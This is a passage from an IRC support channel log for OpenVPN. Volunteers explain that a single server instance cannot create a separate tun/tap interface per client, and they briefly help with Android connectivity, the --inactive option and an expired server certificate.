connecting client. is that possible using config options ? 15:33 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 15:34 <+pekster> voyo: Not with a single instance, no. Either use unique instances per client or find another way to do what you want. Why do you want unique devices for each client anyway? 15:36 < voyo> pekster: want to do more complex setups. I even dont want to openvpn to assign IP address, want to doing all myself. (addresses, routes, rules, qos, & more). but as 1st I need separate interface per connecting client. 15:36 <+pekster> No, you don't 15:36 < voyo> ? 15:36 <+pekster> Use a --client-connect script tand you can manage the IP assingment all on your own 15:37 <+pekster> You have absolutely no need to use a separate device on the server-side for every connecting client to do what you want 15:37 -!- kenyon [kenyon@darwin.kenyonralph.com] has quit [Ping timeout: 246 seconds] 15:37 < voyo> yes, I know this. but its more convenient for me to configure myself (ofc automaticaly, but without attention of openvpn process). 15:37 < voyo> pekster : yes I do. I know what I need ;) 15:38 -!- kenyon [kenyon@darwin.kenyonralph.com] has joined #openvpn 15:38 <+pekster> Well, I manage to QoS and firewall users, and even give unique sets of users differentn routes to various corporate networks and assign some by known-IPs, all with a single instance 15:39 < voyo> pekster: but separate instance is not very convenient, I have to have separate listening port. no other options ? 15:39 <+pekster> But you're also free to start a separate VPN service for every connecting client. Remember that you need a unique network range and port for every client 15:39 <+pekster> voyo: The other option is to design your system properly. You're going about this completely the wrong way 15:40 < voyo> pekster: ok, how do you want to do bonding without separate interface ? 15:40 <+pekster> Bond outside of opepnvpn and tunnel across a bonded interface if that's what you want 15:40 < voyo> qos without separate interface is also very limited. 15:41 < voyo> yes it is :) 15:41 < voyo> anyway thats not the matter of my question 15:41 <+pekster> Not if you write proper rules. QoS can filter/match on whatever you'd like (in Linux, the combination of tc and netfilter is very poweful) 15:41 < voyo> yes I know all of that. 15:42 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 15:42 < voyo> I only need to run separate interface for every connectin client. 15:42 < voyo> do you know if this was possible in older openvpn version ? I'v read something like that.. 15:42 <+pekster> I don't understand the question. OpenVPN has always let you run as many instances as you'd like 15:43 <+pekster> There has never been and never will be a config option to create a separate tun/tap device for each connecting client. The device is bound to the instance, like any other networking protocol on the planet 15:43 < voyo> yes yes, but in single instance. 15:43 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 15:43 <+pekster> (technically speaking it binds to the socket, which then sends to an interface, but that's not really important for this discussion) 15:44 <+pekster> No, you cannot do that, for the 3rd time 15:44 < voyo> like hm... running single instance, listening on port 1094 , then if client connect its spawning new instance (if needed?), or just create new interface for every client 15:44 <+pekster> I understand your question. Stop asking it, becuase the answer is still no. OpenVPN does not work like that 15:44 <+pekster> !howto 15:44 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 15:45 < voyo> ok ok. I'v read all manuals. 15:45 < voyo> and thats why Im here on IRC 15:45 < voyo> to get help and answers on things which are not there ;) 15:46 < voyo> and what about running it from inetd ? possible ? (regarding my demands) 15:47 <+pekster> See the --inetd config option: openvpn can run via inetd, but you need a separate line-item for each port you're listening on, with a unique configuration for each port 15:47 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 15:47 < voyo> hm ... ok... thats also not very convenient :/ 15:47 <+pekster> What you want is the standard multi-client mode and to handle your special needs via scripting and post-connection process calls. Given that those scripts can do anything you can program, I can't imagine how that isn't enough for you 15:49 < voyo> yes, exatcly , I need multi-client mode, with scripiting (just possibility to "external" configuration of client). but important is separate interface for every new client. 15:50 < voyo> seems I have to patch it myself.. shame 15:51 <+pekster> You haven't explained why you can't use post-connect scripts. The idea of "bonding" only ever makes sense when you have multipath routing and wish to combine multiple physical links. OpenVPN is a virtual link, not a physical one, so the notion of bonding over it is pointless 15:51 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has joined #openvpn 15:51 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 15:52 <+pekster> I'm happy to answer questions that might lead to a better use of the tools you have available, but no one here can help with what you're asking for as it doesn't exist and never will 15:52 < voyo> from what I'v read, the option ifconfig-pool-linear or topology p2p should probably work like I need , but I tried , and its not 15:52 <+pekster> ifconfig-pool-linear is deprecated; use topology subnet instead 15:53 < voyo> what about "topology p2p" ? 15:53 <+pekster> You can use p2p topology if supporting Windows clients is not required, if you'd prefer not to push the entire subnet implicitly 15:53 <+pekster> With proper firewalling the security benefits of p2p are negligable, so it's really just about supporting Windows and/or making clien communication to other clients a bit easier 15:53 -!- digilink [~digilink@unaffiliated/digilink] has quit [Read error: Connection reset by peer] 15:54 < voyo> yes, I dont have windows clients 15:54 <+pekster> topology p2p is fine then 15:54 <+pekster> Each connecting client gets a Point-to-Point interface configuration, much like you'd expect with a sit or GRE tunnel (but done via tun and OpenVPN) 15:54 < voyo> but seems its still not working (or there is a bug) like I wanted (and described here) 15:55 < voyo> new interface are note created. only single one does exist. 15:55 < voyo> I'd expected to have more interfaces when using this option 15:55 <+pekster> Correct. This is how OpenVPN works. There is no bug 15:55 < voyo> am I right ? 15:55 <+pekster> No, you are not 15:55 < voyo> erm 15:55 < voyo> Im confused. 15:55 <+pekster> What "bug" do you have? If you cannot ping across the PtP link after OpenVPN connects, then you have made a mistake in your setup, probably in your firewall as OpenVPN logs most other connection errors 15:56 < voyo> I mean , I expected, when using p2p option, it should create new p2p interface for every connection clinet? 15:56 <+pekster> Nope 15:57 < voyo> hm... 15:57 <+pekster> THe server will allocate tun0 (or whatever you called it.) It gets a PtP setup, for example, '10.8.0.1/32 peer 10.8.0.0' 15:57 < rob0> Pro tip: never suggest "bug" unless you are very confident in your understanding of the software, and even then, it's better to let the developers who fix it be the first to call it a bug. 15:57 < voyo> hehe yes, right. sorry :P 15:57 <+pekster> rob0: Better yet, send the devs a patch fixing the bug, demonstrating that you can read the sources and are more likely to have actually discovered it is, in fact, a bug :D 15:58 <+pekster> <3 15:58 < rob0> well, of course, if you know how to find it and fix it, you should. :) 15:58 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 15:59 < rob0> in that case you are a "developer" 15:59 < voyo> anyway Im not the first noob from street, Im using openvpn for years. just now have special needs for special customer... 16:00 <+pekster> You've still, near as I can tell, failed to explain why you can't use PtP connectivity and handle your QoS, IP-asisgnment, routing, and firewalling with script hooks 16:01 -!- emmanuel__ [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:02 < voyo> I have to have separate interface for every connecting client. I dont want (can't) to tell all reasons why. My customer needs this. 16:02 <+pekster> Then we can't help you 16:02 <+pekster> !topsecret 16:02 <@vpnHelper> "topsecret" is if your setup is so top secret that you cant post your configs or logs, please leave now and go find support you trust. 16:02 < voyo> qos, bonding, that should explain most. 16:03 < voyo> no , its not matter of trust. and I can post all openvpn configs 16:03 <+pekster> I already told you why bonding doesn't apply to virtual devices. If you have such a secret setup you can't talk about it, then you need to stop wasting our time 16:03 -!- emmanuel__ [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Read error: Connection reset by peer] 16:03 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.] 16:03 < voyo> yes it does. 16:03 < voyo> Im succesfully bonding GRE tunnels. 16:04 < voyo> but thats not the matter of my problem. now I need to openvpn too 16:05 < voyo> so I need to find an answer - if I can do this with openvpn somehow (what I'd like to do, becasues I know and trust openvpn), or do some (preferable easy) changes to openvpn source code, or - find other vpn solution which will fits my needs. 16:06 <+pekster> The go find another solution. No one here is forcing you to use openvpn. We're unpaid volunteers giving back to the community, not your custom team of crackpot programmers 16:07 -!- Cpot-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 16:09 < voyo> sure I know. Im not demanding anything from you 16:10 < voyo> just asking if what I need is possible 16:10 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 252 seconds] 16:11 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 16:12 -!- Cpot-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 240 seconds] 16:12 < voyo> I even told you Im able to code required change myself, and back it to comunity. you dont need to be rude. 16:14 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 16:14 -!- Starscreamer [~starscrea@b0ff367c.bb.sky.com] has joined #openvpn 16:15 <@ecrist> voyo: what are you looking for? 16:16 < voyo> ecrist: : possibility to run on server new interface for every connecting client 16:16 < voyo> (easily) 16:16 <@ecrist> openvpn does not support that 16:16 < pppingme> voyo each instance of openvpn running creates ONE interface, if you want multiple interfaces, you have to run multiple instances 16:16 < pppingme> I have a feeling what you really want is this: 16:17 < voyo> yes, I know that already. pekster has explained that to me. I wanted to assure, and ask here. after I'v read all docs, howts etc. 16:17 <@ecrist> there was an old version of openvpn that did this 16:17 <@ecrist> but we're talking 8 years ago 16:17 < pppingme> no, the old version was still 1 instance=1 interface 16:18 < pppingme> wasn't it? 16:18 <@krzee> pekster, i watched that video with djb twice and did not see anything about md5/sha1 in openssl.cnf 16:18 < pppingme> or is there something I'm not remembering? 16:18 < voyo> ecrist: ha! so I have right! I wasn't sure , but I think openvpn was working like that few years ago when I was playing with it. can you point me to this version ? 16:18 <@krzee> still a badass video tho 16:18 <@ecrist> no, iirc early openvpn (like 1.x) did a separate tun interface per client 16:19 < voyo> ok, I'll check this trace. maybe I'll easily adopot this back in new version. 16:19 < pppingme> voyo what I think you really want is --client-to-client, make sure its NOT enabled.. 16:19 <@ecrist> voyo: quite honestly, we don't want it 16:20 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 16:20 <@krzee> lol 16:20 <@krzee> seriously, why would we want that? 16:20 <@krzee> we have client/server working fine with 1 interface and WITH forward security 16:20 < voyo> ecrist: : sure, I know , thats why its not in new version. but I need this ;) 16:20 < pppingme> WHY do you need it? whats your goal in it? 16:20 <@krzee> you likely dont, you likely just need to understand more 16:20 <@ecrist> can I ask, why? what are you trying to do? 16:21 < voyo> why I need this - becasue of QoS, bonding, and some other things 16:21 <@krzee> you dont need that for qos or bonding 16:21 <@ecrist> or likely, "other things" 16:21 <@krzee> and you do need tap (not tun) if you wanna do bonding 16:22 < ngharo> http://www.2dayblog.com/images/2011/november/550x-I-NEED-DIS.jpg 16:22 < voyo> how can you bond interfaces without having separate interface for each client? :) 16:22 <@ecrist> what are you bonding? 16:22 <@krzee> and how you gunna ethernet bond tun devices? 16:22 < voyo> krzee : well, have possibilito to bond both tun and tap interfaces. doesnt matter for me (much). 16:22 < pppingme> what is your goal in bonding? clients (and you) probably only have one internet connection anyway, so bringing up two or three "instances" and bonding them together buys you nothing.. 16:23 <@krzee> whats your ACTUAL goal 16:23 <@krzee> we cant help you iuf you are vague and sound like you dunno what you want 16:24 < voyo> ok. ok. Im working for bonding company. we are creating bonding/loadbalancing solutions (for internet links). 16:24 <@krzee> a bonding company? 16:24 < pppingme> ok, but it still comes down to the clients only have ONE connection, there is nothing to bond.. 16:25 < voyo> currently Im bonding succesfully virtual interfaces like GRE, and even vtun (your "competition"), so I know how to bond tun/tap. 16:25 <+pekster> Fantastic. Let them have the feature-creep. Unixes pride themselves (most of the time) on "one task, one program" 16:25 < voyo> but I prefere openvpn than vtun. for soem reasons its not as stable as opevpn. 16:26 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 16:27 < voyo> its not a problem for customer to have multiple links to internet, and some of them wan't to bond vpn links too. (over different wan links ofc). 16:27 < voyo> all clear now ? 16:28 < voyo> *want 16:28 <@ecrist> VPN clients have multiple tun/tap interfaces, the server does not, unless you operate in P2P mode 16:28 < pppingme> then their connections need to be bonded at the router/isp level, in which case it becomes invisible to applications (like openvpn) 16:28 <+pekster> Not at all. Do GRE/sit/whatever, create your bond0 or what have you from it, and run openvpn over bond0. Your problem is as simple as that. Bonding, plus transit-level security provided by openvpn. 16:29 < voyo> ecrist: yeah, I tried to enable " ifconfig-pool-linear" directive, or "topology p2p", but still it didnt gave me separate interfaces :( 16:29 <@ecrist> p2p requires a separate openvpn instance for every connection 16:29 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 16:29 <@ecrist> ifconfig-pool-linear isn't even related 16:29 <+pekster> 'topology p2p' does not, however. That uses multi-client mode issuing Point-to-Point setups to all clients 16:29 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 16:30 < voyo> ecrist : oki. I think I know all now. I'll try to implement part of code from 1.x version. maybe it will fits my demands. 16:30 <@ecrist> don't bother pushing it upstream 16:31 < voyo> ok. there surely were reasons you dont support this in 2.2 and was removed 16:31 < pppingme> voyo if you're just trying to "cowboy" all this stuff together, then you're going to quickly end up with a high maintenance unsupported configuration, of course thats what some consultants seem to thrive on, screwing their clients.. 16:31 <@ecrist> mostly, it's dumb. :) 16:32 < voyo> anyway tnx guys, I only wanted to know if this what I want is possible with openvpn. 16:33 < rob0> What was removed? 16:33 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 16:33 < rob0> "I'll try to implement part of code from 1.x version," what in particular? 16:34 <@ecrist> he's referring to the old, new tun/tap interface for every client 16:34 < voyo> something dump and that noone cares anymore. 16:34 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 16:34 < rob0> that still exists ... 16:34 <@ecrist> it does? 16:34 < rob0> p2p mode? 16:35 <@ecrist> heh, he wants one openvpn server instance 16:35 < rob0> oh. 16:35 < voyo> its not creating separate interface for every connecting client 16:36 < rob0> Someone came up with a hack for that, with several listening p2p instances and selective DNAT to each one. 16:36 < rob0> this was in the pre-2.0 days 16:36 < voyo> too complex and unreliable. 16:37 < voyo> better is one instance, spawning (if needed actually, ) new openvpn process (thread?) , and creating separate interface for this connection. 16:38 < pppingme> I'm still not sure I've heard a good reason for separate interfaces that isn't more cleanly addressed at another level outside of openvpn 16:41 < voyo> pppingme better QoS handling, bonding, problems finding with tcpdump, running selective IDS , stats (from interface, snmp) , thats all comes to my mind in just a second. I think I can imagine much more after more time... ;) 16:42 <@krzee> bonding server instances? 16:43 <@krzee> qos is fine in the firewall 16:43 <@krzee> tcpdump should work fine if you understand how to use it (filter by client vpn ip) 16:43 < voyo> krzee : bonding interfaces 16:43 <@krzee> IDS, same answer as qos 16:43 <@krzee> bonding interfaces on the SERVER? 16:43 < voyo> yes 16:44 < voyo> for 'download' traffic 16:44 -!- flufmnstr [~fluf@68-190-201-62.dhcp.snbr.ca.charter.com] has quit [] 16:44 < pppingme> voyo every single issue you bring up is more cleanly addressed outside of openvpn 16:44 < voyo> if you say so 16:45 <@krzee> i agree with him, but if you wanna run a separate openvpn per client, feel free. i HIGHLY doubt the software will be changing to meet that need so feel free to script something up 16:45 < voyo> Im not saying it is not possible (beside of bonding), but it is just *much* easier when having seprarate interfaces.. 16:45 < pppingme> I DO say so, and there are probably better ways of doing everything you're asking for 16:45 <@krzee> yep, but bottom line is… if you wanna, go for it 16:45 < pppingme> is your primary goal redundancy, or throughput? 16:46 < voyo> pppingme : with openvpn as uplink - redudancy+security 16:47 <@krzee> you're bonding service interface to something for redundancy? 16:47 <@krzee> o_O 16:47 < pppingme> are these site to site connections, or direct client connections? 16:47 <@krzee> server interface* 16:48 < voyo> krzee : you can use separare links for redudancy, but you will surely lost some (large amount rather) packets when one link gets down. its better to bond them. 16:49 < pppingme> voyo are these site to site connections, or direct client connections? 16:49 < voyo> pppingme : mostly cpe=>central server=> internet, but also cpe1=>server=>cpe2 16:49 < pppingme> so cpe=site, not individual, right? 16:50 < voyo> yes cpe means site, lets say "branch office" 16:50 < pppingme> and these "sites" have more than one internet connection, or just one? 16:51 < voyo> more 16:51 <@krzee> and when the server itself goes down? if you want real redundancy shouldnt you impliment multiple servers and make a darknet? 16:51 < voyo> :) guess 16:52 < pppingme> then here's the simple solution, build SIMPLE tunnels, how ever you want, openvpn, gre, whatever, then run ospf (or if you're iq isn't up to ospf, use the dummied version, rip2) 16:52 < voyo> CPE can be configured even to use 'normal' link as a backup, when everything else fails. or even can have 3G backup for last resort. some customers are demanding.. 16:52 < pppingme> all done 16:52 <+pekster> pppingme: Yea, I've listed that solution twice now. I've stopped trying 16:52 <@krzee> we get people looking for redundancy VERY often, you're the first to want to ethernet bond server vpn interfaces to accomplish it lol 16:52 < pppingme> its what I do 16:53 <+pekster> Indeed. It's what any network professional does: add redundancy, then add a security layer on top. Could be TLS, or IPsec, or opevpn, or w/e depending on high level needs 16:53 < voyo> pppingme : you dont need to offende me, my IQ is enough even to setup iBGP :P 16:54 <@krzee> lol 16:54 < pppingme> but its not high enough to get the point that bonding at the vpn layer is generally BAD news 16:54 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 16:54 <@krzee> screw it, let him impliment his own fail 16:54 <+pekster> pppingme: Doing that is more than bad news in my opinion; it's an OSI layering violation too ;) 16:54 * pppingme gets the bonus point! 16:54 -!- zoredache [~zoredache@pdpc/supporter/professional/zoredache] has joined #openvpn 16:55 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 16:55 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 16:55 < voyo> pppingme : Im telling its best solution, I know already all pros and cons. Im just working for someone who is paying for my bread and butter, and who is telling me that he WANT this. thats all. 16:56 * voyo score one more bonus point... 16:56 < pppingme> voyo if you're a true consultant, or a good employee, then you will explain to your boss why this is bad and give a better solution 16:56 <@ecrist> pppingme++ 16:56 < voyo> lol 16:56 < voyo> you should try to live longer then ;) 16:58 < pppingme> I will live longer, I'm not stressing over very fragile setups that cause all sorts of problems, when I implement a solution, its SOLID, and just plain works! 16:58 < voyo> good for you :) 16:58 <@krzee> 1) explain why FAIL is bad, explain how DOES is better 2) impliment DOES 3) ??? 4) profit 17:00 < pppingme> krzee you're forgetting, 4) profit won't happen, consultants make money when they implement a bad solution and get to keep going back to fix it.. 17:00 <+pekster> Good consultant can make money doing the right thing, and sometimes someone even notices it ;) 17:01 <@krzee> i always got tons of referrals because im never needed after i setup the DOES 17:01 <+pekster> Well, everyone except RMS, but that's why he's not a consultant :P 17:01 <@krzee> given enough time RMS or hitler always shows up in a conversation 17:01 < pppingme> yeah, but some consultants don't get that. I once had a client ask me, "Didn't you just fix yourself out of a job?" 17:01 <@krzee> often at the same time iirc ;] 17:01 < voyo> I bet guys you are all young yet ;) trust me, sometimes its realy better to do what someone wants and get paid for this. not explaining anything and forcing yours "better solution" (tm). 17:02 <@krzee> i guess you havnt had to clean up enoughj bad solutions yet 17:02 <@krzee> after a certain point you realize doing things wrong is bad 17:02 <+pekster> And doing bad things is usually wrong too (morally, anyway) 17:02 <@krzee> around that time you stop implimenting bad solutions ;] 17:02 < pppingme> voyo how old are you? I'm willing to bet I'm older and much more experienced than you at implementing network, especially wan, solutions. 17:03 < voyo> sure. always after I get paid after it. then implementing another, possibly better solution ;) all depends on customer whom to you working with. 17:03 <+pekster> krzee: So, not that this will change your mind, but my IPv6 setup with the sixxs.net tunnel broker was suprisingly smooth. Come join the fun someday ;) 17:03 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 276 seconds] 17:04 <@krzee> one day =] 17:04 <@krzee> (kicking and screaming) 17:04 < voyo> pppingme : Im old enough to not rival in this game ;) 17:05 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 17:06 < pppingme> rival? you already lost 17:08 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 17:09 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 248 seconds] 17:10 <@krzee> basically, you're one of those techs who will impliment fail, knowing its fail, simply so you can get paid to go back… amirite? 17:10 < voyo> kk gus, enough wasting time for me. tnx for your answers. g2g. 17:10 <@krzee> adios 17:10 < voyo> krzee : some day you will learn that they are kind of customers, for which or you are doing what they said and you will get well paid, or you are forced to find somewhere else your bread (but without butter this time). 17:12 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 17:14 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:16 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 17:18 -!- oyunokata [~rrinehart@209.163.177.130] has quit [Ping timeout: 240 seconds] 17:20 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 17:20 -!- spitf1r3 [~quassel@89.200.144.70] has quit [Quit: No Ping reply in 180 seconds.] 17:20 -!- spitf1r3 [~quassel@89.200.144.70] has joined #openvpn 17:29 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 264 seconds] 17:30 -!- Starscreamer [~starscrea@b0ff367c.bb.sky.com] has quit [Quit: Colloquy for iPad - http://colloquy.mobi] 17:30 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 17:32 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 248 seconds] 17:35 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 17:35 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 17:36 -!- raidz is now known as raidz_away 17:38 < jY> can you use --inactive with keepalive? 17:40 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 17:41 <+pekster> jY: Yes, because --inactive only considers data packets for activity timers, and the --ping feature is a TLS-level packet 17:41 < jY> great thanks 17:41 <+pekster> (that's in the manpage, btw) 17:47 -!- raidz_away is now known as raidz 17:54 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 248 seconds] 17:55 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 18:03 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 18:04 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 245 seconds] 18:08 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 18:11 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 18:18 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 18:19 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Ping timeout: 276 seconds] 18:20 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 18:21 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 18:22 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Remote host closed the connection] 18:24 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 18:27 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 18:30 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 18:38 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 18:41 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 18:49 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 19:00 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds] 19:02 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 19:02 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has quit [Ping timeout: 248 seconds] 19:02 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn 19:04 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:06 -!- oyunokata [~rrinehart@71.21.227.159] has joined #openvpn 19:08 -!- oyunokata [~rrinehart@71.21.227.159] has quit [Client Quit] 19:09 -!- oyunokata [~rrinehart@71.21.227.159] has joined #openvpn 19:14 -!- oyunokata [~rrinehart@71.21.227.159] has quit [Client Quit] 19:17 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 19:33 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 19:38 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 19:39 -!- shadoom [~shadoom@91-65-183-58-dynip.superkabel.de] has joined #openvpn 19:40 -!- cosmicgate [~root@216.17.109.26] has joined #openvpn 19:41 -!- raidz is now known as raidz_away 19:41 < shadoom> hey, im having problems with the android version of openvpn. I added my ovpn file to my samsung note (4.1.2) added my credentials and hit connect, it doesnt give any errors and i can see some traffic but there is no internet connection to it. I found some fixes online but they all require a rooted device. Did I just do something wrong or do I really have to root my device? 19:41 < shadoom> I also made sure that the ovpn file works on a windows pc 19:42 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 19:43 < cosmicgate> get openvpn for android 19:43 < cosmicgate> it dosnt require root 19:43 < shadoom> yes thats what i did 19:44 < cosmicgate> did the ovpn file work on windows? 19:44 < shadoom> yes 19:44 < cosmicgate> check your configuration on android 19:44 < cosmicgate> something might be amiss 19:51 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 19:56 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 248 seconds] 20:03 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 20:12 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 20:12 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 20:12 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 20:12 -!- mode/#openvpn [+o krzee] by ChanServ 20:13 -!- wh1p [~wh1pl4sh@host-2-100-148-6.as13285.net] has quit [Ping timeout: 255 seconds] 20:15 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 20:16 -!- cosmicgate [~root@216.17.109.26] has quit [Ping timeout: 256 seconds] 20:22 -!- catsup [~d@64.111.123.163] has quit [Read error: Operation timed out] 20:22 -!- catsup [~d@64.111.123.163] has joined #openvpn 20:27 -!- catsup [~d@64.111.123.163] has quit [Ping timeout: 255 seconds] 20:28 -!- catsup [~d@64.111.123.163] has joined #openvpn 20:30 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 20:30 < shadoom> does anyone else know why the android version of openvpn wouldnt work with my client.ovpn but windows7 and ubuntu does? 20:31 <@krzee> not without more info :D 20:31 <@krzee> tried looking at the logs? 20:31 < shadoom> yeah i dont see any warning on it 20:32 < shadoom> its connected successfully 20:32 < shadoom> but theres no internet access whatsoever 20:33 <@krzee> !logs 20:33 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 20:33 < shadoom> when im connected to the vpn on my android device the only website i can access is the access-server 20:34 < shadoom> well the log is on my phone, let me see if i can copy it out somehow 20:34 -!- cosmicgate [~root@113.210.100.175] has joined #openvpn 20:35 <@krzee> access-server you say? 20:35 <@krzee> !as 20:35 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 20:35 -!- cosmicgate is now known as Guest36577 20:35 < shadoom> well but i use a .ovpn file to connect and the official openvpn app for android? 20:35 <@krzee> go ahead and try to get the log still, im sure #openvpn-as will need it 20:35 < shadoom> okay 20:35 <@krzee> i dunno, you need #openvpn-as 20:35 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Ping timeout: 245 seconds] 20:35 <@krzee> ive never used AS 20:38 -!- Guest36577 [~root@113.210.100.175] has left #openvpn [] 20:38 -!- cosmicgate [~root@113.210.100.175] has joined #openvpn 20:50 -!- zoredache [~zoredache@pdpc/supporter/professional/zoredache] has quit [Quit: leaving] 20:59 -!- adolfomaltez [~taro@190.62.238.211] has joined #openvpn 21:01 -!- pfire2 [~mthode@62.205.111.11] has joined #openvpn 21:02 < pfire2> is there a way to ignore certificate expiration client side? Feb 1 04:02:06 khorne openvpn[30172]: SIGUSR1[soft,tls-error] received, process restarting 21:03 <+pekster> Chnage your clock? Why can't you just re-issue the server certificate? 21:03 * pfire2 is away from home and server cert expired... 21:03 < pfire2> client cert is still good though 21:04 <+pekster> If your PKI is online (or split where part of it that issues frontend certs is online) you can ssh in and re-issue 21:04 <+pekster> I don't suppose that's set up? 21:05 < pfire2> no, ssh only over vpn 21:05 < pfire2> I'm looking at my firewall config to see if I left an in for me though 21:05 < pfire2> well, I might have 21:06 < pfire2> no, not that one :( 21:06 <+pekster> Or just temporarily open it up. I generally don't mind public ssh, although I change the default port and limit acceptable auth types to pubkey only 21:06 <+pekster> I rarely get scans or login attempts using obscure numbers 21:06 <+pekster> Next time mark your calendar for cert expirations ;) 21:07 < pfire2> I'm 7000km away from that system 21:07 < pfire2> ya 21:08 <+pekster> If ssh works over VPN, you can set your local clock backwards to when the cert was still valid, connect in, re-issue the cert, and log out and fix your clock 21:08 <+pekster> Kind of a hack, but it'll work (it wouldn't work with an expired client cert, but that's not (yet) your problem) 21:08 < pfire2> I can try that 21:09 <+pekster> openvpn can do "extra" checks on a certificate, but they first have to pass the existing checks. openvpn relies on OpenSSL to do the verification of certs, so there's no flag to turn it off 21:10 < pfire2> ok 21:11 < pfire2> that did the trick, thanks 21:11 < pfire2> the date thing 21:14 <+pekster> Best check your client expiration too, otherwise you won't be so lucky next time 21:16 < 